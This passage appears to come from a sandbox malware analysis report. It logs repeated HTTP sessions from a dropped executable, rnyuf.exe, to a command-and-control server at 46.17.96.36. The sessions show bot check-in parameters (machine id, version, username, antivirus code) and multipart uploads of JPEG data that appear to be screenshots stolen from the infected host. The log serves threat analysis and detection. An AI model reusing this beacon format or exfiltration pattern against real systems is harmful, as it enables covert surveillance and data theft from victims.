                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:58.811393976 CEST11456OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:58.811556101 CEST11466OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:58.811641932 CEST11469OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:58.844894886 CEST11472OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:58.844979048 CEST11482OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:58.845551968 CEST11485OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:58.845582962 CEST11489OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:58.845613003 CEST11495OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:58.877465010 CEST11500OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:58.877518892 CEST11508OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:58.982319117 CEST11568INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        145192.168.2.44988446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:59.039788008 CEST11569OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:59.122773886 CEST11570INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:59.184695959 CEST11570OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:59.184762001 CEST11570OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:59.184943914 CEST11580OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:59.185062885 CEST11583OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:59.220469952 CEST11593OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:59.220887899 CEST11596OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:59.221451998 CEST11599OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:59.221682072 CEST11610OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:59.256138086 CEST11623OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:59.256176949 CEST11631OUTData Raw: f4 30 5a ff 00 df 86 ff 00 1a ab 79 f0 27 55 b5 88 14 d6 ad a6 91 c9 58 d0 42 c3 73 05 2d 8c 93 c7 dd af 6f ff 00 84 93 42 ff 00 a0 d6 9d ff 00 81 49 fe 35 4f 50 d7 b4 a9 12 06 b6 d5 f4 b7 92 29 77 ed 7b d4 50 46 d6 5e bc fa fa 54 f3 57 ec fe e2
                                        Data Ascii: 0Zy'UXBs-oBI5OP)w{PF^TWCl"xn"m9^C2,sV<ge8(O5[WvM5hZ(5hIadK7szY9Q h4s0Dhapi}P(
                                        Aug 29, 2021 22:27:59.256308079 CEST11636OUTData Raw: 69 5a 00 c5 3b 14 98 a2 c3 b8 a2 97 14 0a 76 29 89 88 29 71 cd 18 a7 77 a6 48 80 53 80 cd 25 38 55 22 58 84 52 62 9e 45 25 0c 06 e2 96 97 14 b8 a6 02 01 4e 14 01 4b 40 98 52 1a 75 03 93 4c 40 a2 a4 51 4d a9 07 02 ad 22 1b 1a d4 ca 94 8e 2a 32 28
                                        Data Ascii: iZ;v))qwHS%8U"XRbE%NK@RuL@QM"*2(` RB(R<V4Q@$QNHD)jKERJM6u cih)i)GZsKLAP(:)ANpLuE!1hP#c6z7s5Q}Ma
                                        Aug 29, 2021 22:27:59.367923021 CEST11681INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        146192.168.2.44988546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:59.288893938 CEST11663OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:59.368249893 CEST11682INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        147192.168.2.44988646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:59.530545950 CEST11683OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:59.613332987 CEST11683INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        148192.168.2.44988746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:59.629726887 CEST11683OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:59.629888058 CEST11684OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:59.630099058 CEST11694OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:59.630208015 CEST11696OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:59.664180040 CEST11704OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:59.665435076 CEST11716OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:59.665474892 CEST11722OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:59.697937965 CEST11725OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:59.697971106 CEST11730OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:59.697984934 CEST11735OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:59.698028088 CEST11746OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:59.800906897 CEST11796INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        149192.168.2.44988846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:59.772950888 CEST11795OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:59.847225904 CEST11796INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.44975046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:15.237274885 CEST2636OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:15.237449884 CEST2636OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:15.237699032 CEST2646OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:15.237847090 CEST2649OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
